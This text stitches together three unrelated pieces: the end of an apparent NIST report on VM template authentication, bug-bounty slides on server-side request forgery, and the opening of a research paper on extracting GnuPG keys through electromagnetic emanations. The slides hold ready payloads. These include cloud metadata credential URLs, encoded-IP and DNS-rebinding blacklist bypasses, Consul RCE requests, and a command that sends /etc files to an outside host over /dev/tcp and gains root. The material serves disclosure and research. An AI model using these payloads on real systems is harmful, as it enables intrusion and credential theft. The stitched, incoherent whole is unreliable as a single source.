This approach has the advantage that the cloud Provider is able to create and modify multiple 
VM templates, and all cloud Consumers c an verify the source and integrity of the VM template 
via a digital signature verification.  It also has the advantage of simplified key management.  All 
that is required are the following: a) the cloud Provider needs to create a single public/private signature key pair and protect the private key from unauthorized use and from unauthorized 
disclosure, b) the cloud Provider needs to provide the public key in a trusted manner
4 to each 
cloud Consumer; and c) the cloud Consumer needs to protect the public key from undetected, 
unauthorized modification. 
                                                           
4 This can be easily accommodated using physical means during contract signing.  
 
 
26 
 The approach has some disadvantages as well.  While on the surface, the approach seems highly 
secure, there are several security concerns with it:  
1. First of all, how does the cloud Consumer communicate securely with the verification 
engine to provide the public key and to obtain the verification results.  Let us assume that the cloud Consumer can establish a secure session using TLS or SSH.  
2. Then the question becomes: how does the cloud Consumer trust the verification engine running in the cloud Provider.  If the cloud Consumer cannot trust or authenticate the verification engine, it has no basis to trust the response from the verifica tion engine 
regarding the VM template signature verification.  
3. Furthermore, whatever means the cloud Consumer uses to establish trust in the verification engine, why not use the same means to trust the VM template and forego the extra step of having to firs t establish trust in the verification engine?  
 
 
Figure A. 1: VM template Authentication Using Digital Signatures  
A.2. VM Template  Authentication using Cryptographic Hash Function  
Another technique  of assuring the integrity of the VM template is by using a cryptographic hash 
function, such as SHA -256, to compute a hash value on the VM template,  and the Consumers 
obtaining the hash value  using an out -of-band means  as illustrated in Figure A -2. 

 
27 
  
The approach has the advantage of requiring no key management.  However, the hash value of the VM template needs to be provided to the consumers using means that assure its integrity and 
source (e.g., physically).  The cloud Consumer provides this hash value for comparison during 
VM template authentication.  
The approach has several disadvantages.  Some of the disadvantages are common to those for digital signatures: 
1. This approach has the limitation that each time the VM template `is modified, a new hash 
value needs to be promulgated using a secure, out -of-band means.  
2. The approach has the limitation that each VM template hash value needs to be 
promulgated using secure, out -of-band means.  One can assume that the cloud will have 
multiple VM templates.  
3. Just like the digital signature, this approach does not solve the problem of the cloud Consumer communicating securely with the verification engine to provide the hash value and obtaining the verification results.  Let us assume that the cloud Consumer can 
establish a secure session using TLS or SSH. 
4. Then the question become s: how does the cloud Consumer trust the verification engine 
running in the cloud Provider.  If the cloud Consumer cannot trust or authenticate the verification engine, it has no basis to trust the response from the verification engine regarding the VM tem plate verification.  
5. Furthermore, whatever means the cloud Consumer uses to establish trust in the verification engine, why not use the same means to trust the VM template and forego the extra step of having to first establish trust in the verification engi ne? 
 
 
28 
  
Figure A. 2: VM template  Authentication Using Cryptographic Hash  
A.3. VM Template  Authentication using Message Authentication Code 
(MAC)  
As illustrated in A -3, another approach is to use  a MAC.  A MAC is calculated using a 
cryptographic function, such as a keyed hash function or a mode of operation for a  symmetric 
block cipher algorithm, that produces a  message authentication code using a secret shared by the 
Provider and the Consumers .  
 
The approach has the advantage of the cloud Provider being a ble to create and modify multiple 
VM templates and all cloud Consumers being able to verify the source and integrity of the VM 
template via MAC verification.  It also has the advantage of simplified key management.  All 
that is required are the following: a) the cloud Provider needs to create a single secret key and protect it from unauthorized use and from unauthorized disclosure; b) the cloud Provider needs to provide to each cloud Consumer with the secret key in a secure manner
5; and c) the cloud 
Consume r needs to protect the secret key from unauthorized disclosure.  
The approach has several disadvantages.  Some of the disadvantages are common to those for using digital signatures:  
                                                           
5 This can be easily accommodated using physical means during contract signing.  
 

29 
 1. Unless the secret key is unique per Consumer, this approach is vulnerable t o one 
Consumer modifying a VM  template  to compromise another Consumer.  Having unique 
keys for each Consumer will increase a cloud Provider’s key management challenge  
2. Just like the use of a digital signature, this approach does not solve the problem of the  
cloud Consumer communicat ing securely with the verification engine to provide the 
secret key and to obtain the verification results.  Let us assume that the cloud Consumer 
can establish a secure session using TLS or SSH. 
3. Then the question becomes: how doe s the cloud Consumer trust the verification engine 
running in the cloud Provider.  If the cloud Consumer cannot trust or authenticate the verification engine, it has no basis to trust the response from the verification engine regarding the VM template authentication.  
4. Furthermore, whatever means the cloud Consumer uses to establish trust in the verification engine, why not use the same means to trust the VM template and forego the extra step of having to first establish trust in the verification engine?  
 
 
Figure A. 3: VM template  Authentication Using MAC  

 
30 
 A.4. VM Template Authentication Based on Cloud Provider 
Discretionary Access Control  
Under this approach Consumer s obtain the VM template  from a location that can be modified by 
the Provider only (i.e., the VM template  is protected using discretionary access controls).  
Though this form of authentication is not a cryptographic technique, we have included this for 
completeness as a possible approach for VM template authentication.  
A.5. Conclusion  
In conclusion, one can see from our higher -level security analysis of the possible cryptographic 
techniques for authenticating VM templates, that none of them solve the twin problem of establishing trust in the VM template, as well as in the verification engine. Hence,  our suggested 
solution for VM template authentication is: 
1. The cloud Consumer should use SSL or SSH to establish a secure session with the VM 
template integrity verification engine.  
2. The application instance housing the VM integrity verification engine need s to be  
configured to run as a secure appliance on a specially hardened VM. The verification engine should also include appropriate public keys, secret keys, and/or hash value s, depending on 
the VM template authentication technique chosen by the cloud Provider.  Note that this approach obviates the need for a secure, out -of-band channel between the cloud Provider and 
the cloud Consumer.  This approach also allows the cloud Provider to change keys , 
algorithms, authentication method and/or a VM template with out having a secure, out -of-
band channel with the cloud Consumer .   Note that a cloud Provider may use different 
cryptographic technique s (digital signatures, cryptographic hash, or MAC) to protect 
different VM templates.  
3. The cloud Consumer should check ou t any VM template , and authenticate the VM template 
and launch the VM.  
The advantage of having a verification engine as opposed to having a VM template under 
discretionary access control is the added fle xibility for the cloud Provider to only secure the 
verification engine using discretionary access control, as opposed to a myriad of VM templates.  
 
   
31 
 Appendix B -  Bibliography  
 
[1] F. Liu, J. Tong, J. Mao, R. Bohn, J. Messina, L. Badger, and D. Leaf, NIST Cloud Computing Reference 
Architecture (NIST SP 500-292), National Institute of Standards and Technology, U.S. Department of 
Commerce (2011).   http://www.nist.gov/customcf/get_pdf.cfm?pub_id=909505  
[2] P. Mell and T. Grance, The NIST  definition of cloud computing (NIST SP 800 -145), National Institute of 
Standards and Technology, U.S. Department of Commerce 
(2011)  http://csrc.nist.gov/publications/nistpubs/800 -145/SP800 -145.pdf   
[3] L. Badger, D. Berstein, R. Bohn, F. de Valux, M. Hogan, J. Mao, J. Messina, K. Mills, A. Sokol, J. Tong, F. 
Whiteside, and D. Leaf, US government cloud computing technology roadmap volume 1: High -priority 
requirements to further  USG agency cloud computing adoption (NIST SP 500 -293, Vol.   1), National Institute 
of Standards and Technology, U.S.   Department of Commerce (2011). 
http://www.nist.gov/itl/clou d/upload/SP_500_293_volumeI -2.pdf  
[4] L. Badger, R. Bohn, S. Chu, M. Hogan, F. Liu, V. Kaufmann, J. Mao, J. Messina, K. Mills, A. Sokol, J. 
Tong, F. Whiteside, and D. Leaf,   US government cloud computing technology roadmap volume II: Useful 
information for  cloud adopters  (NIST SP 500 -293, Vol.   2), National Institute of Standards and Technology, 
U.S.  Department of Commerce (2011).   http://www.nist.gov/itl/cloud/upload/SP_500_293_v olumeII.pdf . 
[5] L. Badger, T. Grance, R. Patt -Corner, and J. Voas, Cloud Computing Synopsis and Recommendations 
(NIST SP 800 -146),   National Institute of Standards and Technology, U.S.   Department of Commerce 
(2012).   http://csrc.nist.gov/publications/nistpubs/800 -146/sp800 -146.pdf  
[6] W. Jansen and T. Grance, Guidelines on Security and Privacy in Public Cloud Computing (NIST SP 800 -
144).   National Institute of Standards and T echnology, U.S.   Department of Commerce 
(2011).   http://csrc.nist.gov/publications/nistpubs/800 -144/SP800 -144.pdf . 
[7] Secure Shell (SSH) Transport Layer Protocol, http://www.ietf.org/rfc/rfc4253.txt  
[8] The Transport Layer Security (TLS) Protocol Version 1.2, http://tools.ietf.org/html/rfc5246  
[9] Internet Security G lossary, Version 2 , http://tools.ietf.org/rfc/rfc4949.txt  
 
[10] F.Bracci, A.Corradi and L.Foschini, Database Security Management for Healthcare SaaS in the Amazon 
AWS Cloud, IEEE Computer, 2012.  
 [11] U nderstanding and Selecting a Database Encryption or Tokenization Solution, http://securosis.com  
 
[12] Best Practices in Securing Your Customer Data in Salesforce, Force.com, and Chatter, 
http://www.ciphercloud.com  
 
 05/21/2015 Nicolas GrégoireAgarri
Offensive security
Server-side browsing 
considered harmful

05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireMethodology
 Identify server-side browsing
Ideally with responses echoed back
 Identify protections (mostly blacklists)
 Then bypass them
 Try to maximize impact during exploitation
 Prefer RCE or Cloud pwnage to port scan
 Aka "creatively express my laziness"
05/21/2015 Nicolas GrégoireScope
Covers only a few bug bounty programs
Facebook, Yahoo, CoinBase, PayPal, ...
Criteria
Interesting targets
Good security team
Fast reaction
Nice payouts
05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireVectors
 Resources for developers
API explorer (Adobe Omniture - @riyazwalikar)
Debug of IPN aka Webhooks (payment world)
 
  Third-party data sources
Upload from URL (Dropbox, FastMail, ...)
Import of RSS feeds (YQL, Yandex, ...)
 Third-party authentication
OAuth, SAML, ... (used everywhere)
05/21/2015 Nicolas GrégoireVectors
 Core features of the target application
Google Translate can work from an URL
Prezi "Export to portable format"
Mixed-content proxies
Hopscotch (FastMail), Camo (Github)
And also "imageproxy", "pilbox", ...
 Hosted code
Parse will execute your own JS code (YQL too!)
05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireURL handlers
file:// is an easy win
May be reached via a HTTP redirect
Java trick: file:///proc/self/cwd/../config/ 
Exotic handlers
gopher://, dict://, php://, jar://, tftp://, ...
Look at the "SSRF Bible" if interested
05/21/2015 Nicolas GrégoireURL handlers
http:// et https:// are always available
Let's focus on these ones!
Lots of possible targets
HTTP and HTTPS applications
Compatible services like Redis
Fingerprintable services
SMTP, SSH, ...
05/21/2015 Nicolas GrégoireDestinations
Main goals
Loopback
Multicast
Secondary goals
Internal network aka LAN
Public IP space
05/21/2015 Nicolas GrégoireLoopback
Often hosts sensitive services
IP-based ACL bypassed by design
Monitoring
Custom: Yahoo "ymon"
Open Source: Consul, Monit, ...
Data repositories
Solr, Redis, memcached, ...
05/21/2015 Nicolas GrégoireLoopback
Depending on the architecture
Loopback may not be the backend
But an outbound proxy
Shared? With who? In scope?
CoinBase & Proximo
05/21/2015 Nicolas GrégoireThe loopback idiosyncrasy 
Symptoms
Scanning using different features
Getting different results
Probable causes
Partial proxying (YQL)
Specialized backends
05/21/2015 Nicolas GrégoireMulticast
 Works for every EC2 or OpenStack VM
Meta-data server at http://169.254.169.254/
 Interesting targets
Always her e
/latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling)
/latest/user-data
Temporary AWS credentials
/latest/meta-data/iam/security-credentials/
05/21/2015 Nicolas GrégoireInternal network
Most of the time, there's a LAN
Except for some Cloud-only setups
With non hardened services
Monitoring, stats, ...
Databases, keystores, ...
But you need the addressing plan
Btw, are you sure 10/8 is in scope?
05/21/2015 Nicolas GrégoirePublic IP space
Sometimes...
Public ACL != internal ACL
Private services on public IP
Not so uncommon...
noc.parse.com => 54.85.239.3
Hosting a Go debugger
05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireBlacklists
Only a few destinations to forbid
So implementing blacklists is easy
Or not?
Let's focus on
http://169.254.169.254/ 
http://127.0.0.1/ 
05/21/2015 Nicolas GrégoireBlacklists – DNS
http://metadata.nicob.net/ 
Simple static A record
http://169.254.169.254.xip.io/ 
Free wildcard DNS service
http://1ynrnhl.xip.io/ 
Encoded as base36(int('254.169.254.169'))
http://www.owasp.org.1ynrnhl.xip.io/ 
If both whitelists and blacklists are used
05/21/2015 Nicolas GrégoireBlacklists – HTTP redirects
Redirect to the meta-data server
HTTP 302 to http://169.154.169.254/ 
Static way
http://nicob.net/redir6a 
Dynamic way
http://nicob.net/redir-http-169.254.169.254:80- 
05/21/2015 Nicolas GrégoireBlacklists – HTTP redirects
Redirects work IRL
Yahoo and Stripe were affected
There's more than 302
Like 307 for POST to POST
Test with a (multi-step) loop
May produce some distinctive errors
Points to a redirect URL via the UI/API
Then make dynamic changes on your side
05/21/2015 Nicolas GrégoireBlacklists – Alternate IP encoding
 Most common representation
Dotted decimal
127.0.0.1, 169.254.169.254, ...
 But any HTTP client supports more
Browser, proxy, library, ...
http://www.pc-help.org/obscure.htm
05/21/2015 Nicolas GrégoireBlacklists – Alternate IP encoding
http://425.510.425.510/ 
http://2852039166/ 
http://7147006462/ 
http://0xA9.0xFE.0xA9.0xFE/ 
http://0xA9FEA9FE/ 
http://0x41414141A9FEA9FE/ 
 
http://0251.0376.0251.0376/ 
http://0251.00376.000251.0000376/
Dotted decimal with overflow
Dotless decimal
Dotless decimal with overflow
Dotted hexadecimal
Dotless hexadecimal
Dotless hexadecimal with overflow
Dotted octal
Dotted octal with padding
05/21/2015 Nicolas GrégoireBlacklists – Alternate IP encoding
 And you can mix them
http://425.254.0xa9.0376/ 
Decimal (w/ and w/o) overflow + hex + octal
 Or convert only parts of the address
http://0251.0xfe.43518/ 
Octal + hex + 2-byte wide dotless decimal
05/21/2015 Nicolas GrégoireBlacklists – IPv6
http://[::169.254.169.254]/ 
IPv4-compatible address
http://[::ffff:169.254.169.254]/ 
IPv4-mapped address
05/21/2015 Nicolas GrégoireBlacklists – loopback only
 http://127.127.127.127/
Yes, it's a /8
 http://0.0.0.0/
Works surprisingly often...
 http://[::1]/ and http://[::]/ 
Moar IPv6
05/21/2015 Nicolas GrégoireBlacklists – DNS TOCTOU
Step 1
The backend server resolves the destination hostname
The backend server verifies the IP against a blacklist
The request is allowed to go to the outbound proxy
Step 2
The proxy resolves the destination hostname
The response now points to a private IP address
Toolbox
Dedicated sub-domain
Patched copy of DNSChef
05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireUnused feature – Stripe
https://checkout.stripe.com/v3/checkout/desktop.js
Containing a (never called) Ajax function
Taking only one parameter named "image_url"
        $.ajax({
                url: "https://checkout-api.stripe.com/color",
                data: { image_url: uri },
                type: "GET",
                dataType: "json"
        })
05/21/2015 Nicolas GrégoireUnused feature – Stripe
Client-side blacklist
Not a security measure
Includes 127.0.0.0/24
Server-side blacklist
Loopback, internal, multicast, ...
But HTTP redirects are honored
05/21/2015 Nicolas GrégoireUnused feature – Stripe
Reward: $500
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireHidden vector – Prezi
Base64-encoded zipped XML document
.

05/21/2015 Nicolas GrégoireHidden vector – Prezi
Easier to manage with a custom Burp extension
.

05/21/2015 Nicolas GrégoireHidden vector – Prezi
Each embedded object is referred by its URL
.

05/21/2015 Nicolas GrégoireHidden vector – Prezi
Looking for some server-side processing
Feature "Export to PDF" => no
Feature "Export to ZIP" => yes
Exploits
file:///etc/passwd ($2k)
http://169.254.169.254/ ($2k)
http://0177.0.0.1/ (IPy bypass, $500)
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireIPN – PayPal
IPN testing interface for developers
Existing blacklist
Bypassed with octal encoding
Exploit
https://012.0110.0150.0036/ 
IPN sent successfully to 10.72.104.30
Reward: $100
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireIPN – John Doe I
Webhooks testing interface for developers
No restriction on the destination
Exploit
http://127.0.0.1:8500/v1/agent/self
First fix bypassed
Using http://0.0.0.0:61315/
Reward: $750
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireIPN – CoinBase
Callbacks testing interface for developers
No restriction on the destination
Exploit
http://169.254.169.254/latest/user-data 
Credentials for EC2, Heroku, ...
In fact, I pwned Proximo
Paid shared outbound proxy
Reward: $5k (time to fix+reward < 24h, kudos!)
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireMixed-content proxy – John Doe II
Links to external images from SSL pages
The perfect SSRF vector
Any method, any header, full response
Exploit (root RCE)
https://xxx/http://0.0.0.0:8500/v1/agent/check/register 
https://xxx/http://0.0.0.0:8500/v1/agent/checks
Reward: $3k
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireThe YMON saga – Part 1
YQL (and Pipes) can access external systems
Existing blacklist (IP address + port)
Applied before following HTTP redirects
.

05/21/2015 Nicolas GrégoireThe YMON saga – Part 1
Closed as WONTFIX
“Thank you for your submission to 
Yahoo! We are aware of this 
functionality on our site and it is working 
as designed.  Please continue to send us 
vulnerability reports!”
Reward: $0
05/21/2015 Nicolas GrégoireThe YMON saga – Part 2
Port TCP/9466
405 Method Not Allowed
WS using the ymon  namespace
Google for "ymon wsdl"
Found ONE question from 2005
05/21/2015 Nicolas GrégoireThe YMON saga – Part 2

05/21/2015 Nicolas GrégoireThe YMON saga – Part 2

05/21/2015 Nicolas GrégoireThe YMON saga – Part 2
WSDL analysis
450 lines, 11 methods
Including echo, exec, ping, version, ...
The exec() method
Looks sooooo interesting
But limited to some Nagios plugins
05/21/2015 Nicolas GrégoireThe YMON saga – Part 2
Abuse the check_log plugin to leak files
check_log -F  /etc/* -O /dev/tcp/1.2.3.4/3333  -q ''
Abuse the check_log plugin to make a copy of bash
check_log -F /bin/bash  -O 
/home/y/libexec/nagios/check_nt  -q ''
Then execute bash with root privileges
check_nt -c 'id;uname -a'
05/21/2015 Nicolas GrégoireThe YMON saga – Part 2
Reward: $15k

05/21/2015 Nicolas GrégoireThe YMON saga – Part 3
Hex encoding used to bypass both the IP and port checks
Access (again) the "ymon" WS on loopback
Execute code as "y" and not "root" anymore
Need to find something new
Identify some (unpatched) "ymon" master servers
Pwn them like previously
Fix for the IP check bypassed using octal encoding
Yes, that's the third bypass!
Reward: $6,600
05/21/2015 Nicolas GrégoireAgarri
Offensive security

05/21/2015 Nicolas GrégoireSSJS – Parse
Language: JavaScript
Two offers
"Cloud Code"
Authenticated calls only
"Parse Hosting"
Complex MVC applications
Outbound requests are allowed
Through a farm of dedicated proxies

05/21/2015 Nicolas GrégoireSSJS – Parse
Private and multicast addresses are filtered
No restriction on loopback
Access to Monit through a proxying app
Internal services running on public IP space
Access to a Redis DB on "noc.parse.com"
Note: external ACL are OK
05/21/2015 Nicolas GrégoireSSJS – Parse

05/21/2015 Nicolas GrégoireSSJS – Parse

05/21/2015 Nicolas GrégoireSSJS – Parse
Internal services found on public IP
Ganglia , Monit, Nagios
Redis, MySQL
Go debugger for /usr/bin/shovel
But no RCE...
Reward: $20k
05/21/2015 Nicolas GrégoireAgarri
Offensive security
Context
Vectors
Targets
Blacklists
Bugs
Toolbox

05/21/2015 Nicolas GrégoireToolbox
Script generating obfuscated IP addresses
Public dynamic endpoint for HTTP(S) redirects
SSL certs are nearly never verified
Web "bins"
http://httpbin.org/ (tons of options)
http://requestb.in/ (useful for blind requests)
List of default ports used by internal and loopback services
05/21/2015 Nicolas GrégoireToolbox
Burp Suite "search" feature
Basic criteria: "=http" and "url="
Will miss REST and XML parameters
Dedicated DNS sub-domain
NS record pointing to a controlled server
Used for detection (now in Burp Suite) and blacklist evasion
Patched copy of DNSChef
Takes multiple IP addresses and a resolution scheme
05/21/2015 Nicolas GrégoireToolbox
root# ./rebind.py --ip1= 169.254.169.254  –ip2=<LEGIT_IP>
 --scheme= 212 --interface=<YOUR_DNS_SRV>
[*] DNS Rebinder started on interface: <YOUR_DNS_SRV> 
[23:51:46] xxx.yyy.162.36: cooking the response of type  
'A' for xxx.dyn-dom.tld to <LEGIT_IP>  [1]
[23:51:46] xxx.yyy.165.239:  cooking the response of type 
'A' for xxx.dyn-dom.tld to 169.254.169.254  [2]
[23:51:49] xxx.yyy.167.12:  cooking the response of type 'A' 
for xxx.dyn-dom.tld to <LEGIT_IP>  [3]
[23:53:13] xxx.yyy.162.36: cooking the response of type  
'A' for xxx.dyn-dom.tld to <LEGIT_IP>  [1]
05/21/2015 Nicolas GrégoireToolbox
Dynamic HTTP redirects
Easy to use with Burp Intruder
Using a basic RewriteRule
Source
^redir-([^/-]*)-([^/-]*)-(.*)$
Destination
$1://$2/$3 [L]
05/21/2015 Nicolas GrégoireAgarri
Offensive security
The end...

05/21/2015 Nicolas GrégoireConclusion
Attackers
Weird machines
Primitives, exploit chains, ...
Defenders
If you only need Internet resources
Put your endpoint outside!
And good luck!
05/21/2015 Nicolas GrégoireAgarri
Offensive security
The end...
Stealing Keys from PCs using a Radio:
Cheap Electromagnetic Attacks on Windowed Exponentiation
(extended version)
Daniel Genkin
Technion andTel Aviv University
danielg3@cs.technion.ac.ilLev Pachmanov
Tel Aviv University
levp@post.tau.ac.ilItamar Pipman
Tel Aviv University
itamarpi@tau.ac.il
Eran Tromer
Tel Aviv University
tromer@tau.ac.il
Posted February 27, 2015
Updated March 2, 2015
Abstract
We present new side-channel attacks on RSA and ElGamal implementations that use the
popular sliding-window or fixed-window ( m-ary) modular exponentiation algorithms. The at-
tacks can extract decryption keys using a very low measurement bandwidth (a frequency band
of less than 100 kHz around carrier under 2 MHz) even when attacking multi-GHz CPUs.
We demonstrate the attacks’ feasibility by extracting keys from GnuPG, in a few seconds,
using a nonintrusive measurement of electromagnetic emanations from laptop computers. The
measurement equipment is cheap and compact, uses readily-available components (a Software
Defined Radio USB dongle or a consumer-grade radio receiver), and can operate untethered
while concealed, e.g., inside pita bread.
The attacks use a few non-adaptive chosen ciphertexts, crafted so that whenever the decryp-
tion routine encounters particular bit patterns in the secret key, intermediate values occur with
a special structure that causes observable fluctuations in the electromagnetic field. Through
suitable signal processing and cryptanalysis, the bit patterns and eventually the whole secret
key are recovered.
1
Contents
1 Introduction 3
1.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2 Our Contribution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3 Vulnerable Software and Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
1.5 Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2 Cryptanalysis 7
2.1 GnuPG’s Sliding-Window Exponentiation Routine . . . . . . . . . . . . . . . . . . . 7
2.2 ElGamal Attack Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.3 RSA Attack Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.4 Leakage from GnuPG’s Multiplication Routine . . . . . . . . . . . . . . . . . . . . . 12
3 Experimental Results 14
3.1 SDR Experimental Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.2 Signal Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.3 ElGamal Key Extraction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
3.4 RSA Key Extraction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
3.5 Long-Range Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.6 Untethered SDR Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
3.7 Consumer-Radio Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
4 Discussion 25
Acknowledgments 26
References 26
2
1 Introduction
1.1 Overview
Even when a cryptographic scheme is mathematically secure and sound, its implementations may
be vulnerable to side-channel attacks that exploit physical emanations. Such emanations can leak
information about secret values inside the computation, directly or indirectly, and have been ex-
ploited by attacks on many cryptographic implementations (see [And08, MOP07, KJJR11] for
surveys). Traditionally, most of the research attention on physical side-channel attacks has focused
on small devices such as smartcards, FPGAs, RFID tags, and other simple embedded hardware.
General-purpose PCs (laptop and desktop computers, servers, etc.) have received less academic at-
tention. While software-based side-channel attacks on PCs (e.g., exploiting timing and CPU cache
contention) have been studied, studying physical side channels in PCs requires that we overcome
several difficulties:
1.Complexity. As opposed to small devices, which often contain a single main chip and some
auxiliary components, PCs are highly complex systems containing multiple large chips, numerous
electric components, asynchronous mechanisms, and a complicated software stack.
2.Acquisition Bandwidth. Typical side-channel approaches require the analog leakage signals
to be acquired at a bandwidth greater than the device’s clockrate. For the case of PCs running
a GHz-scale CPU, recording such high-bandwidth signals requires expensive, cumbersome, and
delicate-to-operate lab equipment, and a lot of storage and processing power.
3.Signal Integrity. Multi-GHz bandwidths are also hard to acquire with high fidelity, especially
non-intrusively, since such high frequencies are usually filtered close to their source using cheap
and compact components (such as bypass capacitors) and are often subject to rapid attenuation,
reflections, and so forth. Quantization noise is also a concern, due to limited ADC dynamic
range at such frequencies (typically under 8 bits, as opposed to 16 or more effective bits at low
frequencies).
4.Attack Scenario. Traditional side-channel attacks often require that the attacker have un-
deterred access to the target device. These scenarios often make sense for devices such as
smartcards, which are easily pilfered or even handed out to potential attackers (e.g., cable-TV
subscription cards). Yet when attacking other people’s PCs, the physical access is often limited
to brief, nonintrusive access that can go unobserved.
Physical side-channel attack from PCs have been reported only at a low bandwidth leakage (less
than a MHz). Emanations of interest have been shown at the USB port [OS06] and through the
power outlet [CMR+13]. Recently, low-bandwidth physical side-channel key-extraction attacks
on PCs were demonstrated [GST14, GPT14], utilizing various physical channels. These last two
works presented two different low-bandwidth attacks, with different equipment and attack time
requirements:
•Fast, Non-Adaptive MF Attack. A non-adaptive chosen-ciphertext attack exploiting signals
circa 2 MHz (Medium Frequency band), obtained during several decryptions of a single ciphertext.
While both ElGamal and RSA keys can be extracted using this attack in just a few seconds of
measurements, the attack used expensive low-noise lab-grade signal acquisition hardware.
•Slow, Adaptive VLF/LF Attack. Adaptive chosen-ciphertext attack exploiting signals of
about 15–40 kHz (Very Low Frequency / Low Frequency bands) obtained during several decryp-
tions of every ciphertext. Extraction of 4096-bit RSA keys takes approximately one hour, using
common equipment such as a sound card or a smartphone.
3
Scheme Algorithm Ciphertext Number of Time Frequency Equipment Ref.
choice Ciphertexts
RSA square and Adaptivekey bits
41 hour 50 kHz common [GST14]
multiply
RSA, square and Non- 1 seconds 2 MHz lab-grade [GPT14]
ElGamal always multiply adaptive
RSA sliding/fixed Non- 16 seconds 2 MHz, common This
ElGamal window adaptive 8 100 kHz bandwidth work
Table 1: Comparison of previous physical key extraction attacks on PCs. #ciphertexts counts the
number of distinct ciphertexts; measurements may be repeated to handle noise.
This leaves a practicality gap: the attacks require either expensive lab-grade equipment (in the
non-adaptive case), or thousands of adaptively-chosen ciphertexts decrypted over an hour (in the
adaptive case). See Table 1 for a comparison.
Another limitation of [GST14, GPT14] is that they target decryption algorithm implementations
that use a slow exponentiation algorithm: square-and-multiply, which handles the secret exponent’s
bits one at a time. These attacks do not work for sliding-window or fixed-window exponentiation,
used in most RSA and ElGamal implementations nowadays, which preprocess the ciphertext and
then handles the key in chunks of multiple bits.
1.2 Our Contribution
In this work we make progress on all fronts outlined above. We present and experimentally demon-
strate a new physical side-channel key-extraction attack, which is the first to achieve the following:
1.Windowed Exponentiation on PCs. The attack is effective against RSA and ElGamal
implementations that use sliding-window or fixed-window ( m-ary) exponentiation, as in most
modern cryptographic libraries, and running on PCs.
Moreover, the attack concurrently achieves all of the following properties (each of which was
achieved by some prior work on PCs, but never in combination with the other properties, and
not for sliding-window exponentiation):
2.Short Attack Time. This attack uses as few as 8 (non-adaptively) chosen ciphertexts and is
able to extract the secret key in just several seconds of measurements.
3.Low Frequency and Bandwidth. The attack measures signals at a frequency of merely
2 MHz, and moreover at a low bandwidth (less than 100 kHz around the carrier). This makes
signal acquisition robust and inexpensive.
4.Small, Cheap and Readily-Available Setup. Our attack can be mounted using simple
and readily available equipment, such as a cheap Software Defined Radio USB dongle attached
to a loop of cable and controlled by a regular laptop or a small SoC board (see Figures 10–
11 and 10). Alternatively, in some cases all that is required is a common, consumer-grade
radio, with its audio output recorded by a phone (see Figure 13). In both cases, we avoid the
expensive equipment used in prior attacks, such as low-noise amplifiers, high-speed digitizers,
sensitive ultrasound microphones, and professional electromagnetic probes.
4
Cryptanalytic Approach. Our attack utilizes the fact that, in the sliding-window or fixed-
window exponentiation routine, the values inside the table of ciphertext powers can be partially
predicted. By crafting a suitable ciphertext, the attacker can cause the value at a specific table
entry to have a specific structure. This structure, coupled with a subtle control flow difference
deep inside GnuPG’s basic multiplication routine, will cause a noticeable difference in the leakage
whenever a multiplication by this structured value has occurred. This allows the attacker to learn
all the locations inside the secret exponent where the specific table entry is selected by the bit
pattern in the sliding window. Repeating this process across all table indices reveals the key.
Signal Acquisition and Analysis Approach. The attack is demonstrated, via the electromag-
netic channel, on the latest version of GnuPG, for ElGamal and RSA decryption using a regular
unaltered laptop without any intrusion or disassembling. For each table index, we craft a suit-
able ciphertext and trigger its decryption. The exploited leakage appears as frequency-modulation
on carrier waves, most clearly observed at 1.5–2 MHz. During decryption, we measure a narrow
frequency band, typically 100 kHz, around the carrier. After filtering, demodulation, distortion
compensation and averaging, a clean aggregate trace is produced for each table index. We then
recover the key by deductively combining the (misaligned but partially-overlapping) information
contained in the aggregate traces.
1.3 Vulnerable Software and Hardware
Targeted Hardware. Similarly to [GST14, GPT14], this work targets commodity laptop com-
puters. We have tested numerous laptop computers of various models and makes.1For concrete-
ness, in the remainder of this paper our examples use Lenovo 3000 N200 laptops, which exhibit a
particularly clear signal.
GnuPG. We focused on GnuPG version 1.4.18 [Gpga], which is the latest version at the time
